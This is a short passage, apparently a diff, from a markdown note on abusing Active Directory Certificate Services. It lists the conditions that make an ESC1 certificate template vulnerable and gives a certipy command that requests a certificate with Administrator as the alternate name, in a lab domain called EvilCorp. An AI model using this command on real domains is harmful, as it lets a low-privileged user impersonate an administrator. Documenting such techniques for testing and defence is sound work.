RayRRT/Active-Directory-Certificate-Services-abuse/ADCS.md

 * Authorized signatures are not required.
 * Have certificate enrollment rights that allow a low-privileged attacker to request and obtain a certificate based on the template.

+How to abuse:

+* We can request a certificate based on the vulnerable certificate template and specify an arbitrary SAN
 ```
  certipy req 'EVILCORP/TheHorseman:EvilCorp3.@EVILDC1.EvilCorp.local' -ca 'EvilCorp-EVILDC1-CA' -template 'Vulnerable ESC1' -alt 'Administrator@EvilCorp.local'